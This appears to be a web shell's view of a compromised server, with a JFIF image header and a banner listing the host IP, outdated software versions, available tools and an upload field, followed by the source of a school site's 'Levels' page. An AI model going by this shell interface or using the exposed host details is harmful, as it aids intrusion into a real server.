????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.15.223.214 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old7/ |
Upload File : |
<!DOCTYPE html> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <html> <head> <meta id="id_meta" /> <title>School - Levels</title> <link href="css/shared_styles_new.css" rel="stylesheet" type="text/css" media="all"><!--Order1--> <script src="js/topmostInfo.js" type="text/javascript"></script><!--Order2--> <script src="js/enumsClasses.js" type="text/javascript"></script><!--Order3--> <script src="js/shared_functions_new.js" type="text/javascript"></script><!--Order4--> <style> .tdStyle { vertical-align: middle; text-align: center; } </style> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.None, Category.None); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, 'Levels', false, false, false); shared_setFooterTableEmpty('id_tblFooter', false); updateButtonsInfo(); } function page_onLoad() { var deviceType = shared_getDeviceType(); if (deviceType == shared_DeviceTypeAndroid) { shared_show_claps_animation_for_initial(); setInterval(shared_hideClapsImage, 10); } shared_setTablesHeightsForIE(); } function updateButtonsInfo() { var deviceType = shared_getDeviceType(); var buttonStyle = 'shared_style_buttons_levels_html'; var buttonStyle_disabled = shared_currentDeviceOS == shared_deviceOS_iOS ? 'shared_style_buttons_levels_html' : 'shared_style_buttons_levels_html_disabled';/*Aug16*/ var sizePercentage = shared_getSizePercentageAsPerDeviceHeightWidth(); var sizeMultiplyValue = 40; var fontSize = sizeMultiplyValue * sizePercentage; var fontSizeButtonText = fontSize * (shared_dataTableHeight < 500 ? 0.6 : 0.4); var buttonHeight = fontSize * 1.4; var borderRadius = fontSize; fontSizeButtonText = fontSizeButtonText + 'px'; buttonHeight = buttonHeight + 'px'; borderRadius = borderRadius + 'px'; var eDiv = document.getElementById('id_div_button_levelA'); eDiv.innerHTML = '<input type="button" value="Level A" class="' + buttonStyle + '" onClick="btnLevelA_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; var eDiv = document.getElementById('id_div_button_levelB'); eDiv.innerHTML = '<input type="button" value="Level B" class="' + buttonStyle + '" onClick="btnLevelB_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; var eDiv = document.getElementById('id_div_button_levelC'); eDiv.innerHTML = '<input type="button" value="Level C" class="' + buttonStyle + '" onClick="btnLevelC_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; var eDiv = document.getElementById('id_div_button_levelD'); eDiv.innerHTML = '<input type="button" value="Level D" class="' + buttonStyle + '" onClick="btnLevelD_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; var eDiv = document.getElementById('id_div_button_levelE'); eDiv.innerHTML = '<input type="button" value="Level E" class="' + buttonStyle + '" onClick="btnLevelE_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; var eDiv = document.getElementById('id_div_button_levelF'); eDiv.innerHTML = '<input type="button" value="Level F" class="' + buttonStyle + '" onClick="btnLevelF_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; var eDiv = document.getElementById('id_div_button_levelG'); eDiv.innerHTML = '<input type="button" value="Level G" class="' + buttonStyle + '" onClick="btnLevelG_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; var eDiv = document.getElementById('id_div_button_levelH'); eDiv.innerHTML = '<input type="button" value="Level H" class="' + buttonStyle + '" onClick="btnLevelH_click()" style="width:45%; height:' + buttonHeight + '; font-size:' + fontSizeButtonText + '; border-radius:' + borderRadius + '; text-align:middle; text-height:auto">'; } function btnLevelA_click() { shared_currentLevel = 'LevelA'; window.location = 'Html/LevelA/LevelACategories.html'; } function btnLevelB_click() { shared_currentLevel = 'LevelB'; window.location = 'Html/LevelB/LevelBCategories.html'; } function btnLevelC_click() { shared_currentLevel = 'LevelC'; window.location = 'Html/LevelC/LevelCCategories.html'; } function btnLevelD_click() { shared_currentLevel = 'LevelD'; window.location = 'Html/LevelD/LevelDCategories.html'; } function btnLevelE_click() { shared_currentLevel = 'LevelE'; window.location = 'Html/LevelE/LevelECategories.html'; } function btnLevelF_click() { shared_currentLevel = 'LevelF'; window.location = 'Html/LevelF/LevelFCategories.html'; } function btnLevelG_click() { shared_currentLevel = 'LevelG'; window.location = 'Html/LevelG/LevelGCategories.html'; } function btnLevelH_click() { shared_currentLevel = 'LevelH'; window.location = 'Html/LevelH/LevelHCategories.html'; } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image" > </div> <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0" style="border-collapse:collapse"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" hieghtForIE="84%"> <td> <table class="shared_style_cellspacing_1_percent_IE" width="100%" height="100%" border="1" cellspacing="2%" cellpadding="0"> <tr> <td height="100%"> <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="0"> <tr> <td height="100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td class="tdStyle"> <div id="id_div_button_levelA"></div> </td> </tr> <tr> <td class="tdStyle"> <div id="id_div_button_levelB"></div> </td> </tr> <tr> <td class="tdStyle"> <div id="id_div_button_levelC"></div> </td> </tr> <tr> <td class="tdStyle"> <div id="id_div_button_levelD"></div> </td> </tr> </table> </td> <td height="100%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td class="tdStyle"> <div id="id_div_button_levelE"></div> </td> </tr> <tr> <td class="tdStyle"> <div id="id_div_button_levelF"></div> </td> </tr> <tr> <td class="tdStyle"> <div id="id_div_button_levelG"></div> </td> </tr> <tr> <td class="tdStyle"> <div id="id_div_button_levelH"></div> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script type="text/javascript" src="../../js/index.js"></script> <script type="text/javascript"> page_preLoad(); </script> </body> </html>